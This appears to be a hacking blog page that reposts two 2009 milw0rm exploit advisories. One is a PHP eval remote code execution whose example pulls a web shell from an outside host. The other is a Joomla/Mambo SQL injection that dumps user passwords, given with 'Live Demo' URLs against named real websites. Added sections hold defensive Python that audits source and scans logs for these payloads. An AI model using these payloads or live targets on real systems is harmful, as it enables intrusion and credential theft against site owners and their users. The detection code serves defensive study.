exploit live cat

Posted on 10.10 by CS-31


bug website

Posted on 10.00 by CS-31


#################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################

[+] Remote PHP Code Execution

- Vulnerable code in system/services/init.php :

---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------

- PoC :

http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]

- Example :

http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";

- Example 2 :

http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();

#################################################################################################################

# milw0rm.com [2009-06-03]
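
An added example, not part of the advisory or of the Movie PHP Script code base: a small source audit that reports where request data is passed straight into a code-evaluating PHP call, the pattern quoted above at line 84 of system/services/init.php. The sample file and the names find_request_eval and call_argument are constructed for illustration, and only a direct flow inside a single call is detected.

```python
import re

# Request superglobals whose contents the client controls.
TAINTED = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\s*\[\s*['\"]?(\w+)")
# PHP constructs that evaluate a string as code.
SINK = re.compile(r"\b(eval|assert|create_function)\s*\(", re.IGNORECASE)


def call_argument(src, open_idx):
    """Return the text between the '(' at open_idx and its matching ')'."""
    depth, quote, i = 0, None, open_idx
    while i < len(src):
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1            # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
        i += 1
    return src[open_idx + 1:]     # unbalanced source: take the remainder


def find_request_eval(src):
    """List (line, sink, source) where request data reaches a code-evaluating call."""
    findings = []
    for m in SINK.finditer(src):
        arg = call_argument(src, m.end() - 1)
        t = TAINTED.search(arg)
        if t:
            line = src.count("\n", 0, m.start()) + 1
            findings.append((line, m.group(1).lower(), f"$_{t.group(1)}[{t.group(2)}]"))
    return findings


# Constructed sample file; line 3 is the statement quoted in the advisory.
SAMPLE = """<?php
// request bootstrap (constructed)
@eval(stripslashes($_REQUEST['anticode']));
eval('return 1 + 1;');
$q = strtolower($_GET['q']);
"""

if __name__ == "__main__":
    print(find_request_eval(SAMPLE))
```

A finding of this kind has no safe filtered form: the statement has to be removed from the file, since any value the client sends is executed as PHP.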

Joomla Component com_mosres

Posted on 10.39 by CS-31

==================================================================================
Joomla Component com_mosres (property_uid) SQL injection Vulnerability
==================================================================================



###################################################
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)

###################################################

Conditions : magic_quotes_gpc = Off
---------------------------------------------------
Example Joomla:
http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code]

[SQL code]:
null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*

Live Demo:
http://ahtopolbg.com/index.php?option=com_mosres&catID=1004&regID=2&task=viewproperty&property_uid=null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*

---------------------------------------------------
Example Mambo:
http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code]

[SQL code]:
null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*

Live Demo:
http://www.velingradbg.com/index.php?option=com_mosres&task=viewproperty&property_uid=1005%27%20and%201=2%20union%20select%201,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*

**************************
however, still looking ... component, can be injected in several places (not all or always).
Almost always SQL injection & also blind sql injection.
I let you work ;)

http://www.ahtopolbg.com/index.php?option=com_mosres&task=showregion&regID=4%27+and+1=2+union%20select%201,concat(username,0x3a,password)+from+jos_users/*&lang=bg

**************************


+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++




Component details:
Name        : Mos Res
Date        : 23/02/2005
Author      : Vince Wooll
License     : This component is released under the GNU/GPL License
Email       : mosres@woollyinwales.co.uk
URL         : http://www.mosres.net
Version     : 1.0f
Description : Mambo Resident component for v4.5.2

# milw0rm.com [2009-06-03]
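
An added example, not part of the advisory: detection logic for web access logs that flags requests whose decoded parameters carry the payload shape quoted above (a UNION SELECT against jos_users or mos_users). The log lines, client addresses and function names are constructed; the request paths reuse the advisory's localHost examples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures taken from the payload shape quoted in the advisory.
RULES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "cms_users_table": re.compile(r"\bfrom\s+(?:jos|mos)_users\b", re.I),
}
# Common log format: client ident user [time] "METHOD target PROTOCOL" ...
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def scan_line(line):
    """Return (client, {param: [rule, ...]}) for a suspicious request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    flagged = {}
    # parse_qsl undoes both '+' and %XX encoding, so the two encodings used
    # in the advisory's examples are matched by the same rules.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits = [rule for rule, rx in RULES.items() if rx.search(value)]
        if hits:
            flagged[name] = hits
    return (client, flagged) if flagged else None


def scan(lines):
    """Scan an iterable of log lines and keep only the flagged requests."""
    return [result for result in map(scan_line, lines) if result]


# Constructed access-log lines (documentation addresses from 192.0.2.0/24).
SAMPLE_LOG = """
192.0.2.10 - - [03/Jun/2009:10:39:01 +0000] "GET /path/index.php?option=com_mosres&task=viewproperty&property_uid=1005 HTTP/1.1" 200 5120
192.0.2.44 - - [03/Jun/2009:10:39:07 +0000] "GET /path/index.php?option=com_mosres&task=viewproperty&property_uid=null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/* HTTP/1.1" 200 4312
192.0.2.45 - - [03/Jun/2009:10:40:12 +0000] "GET /path/index.php?option=com_mosres&task=viewproperty&property_uid=1005%27%20and%201=2%20UNION%20SELECT%201,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/* HTTP/1.1" 200 4410
""".strip().splitlines()

if __name__ == "__main__":
    for client, params in scan(SAMPLE_LOG):
        print(client, params)
```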

The Carding

Posted on 09.11 by CS-31
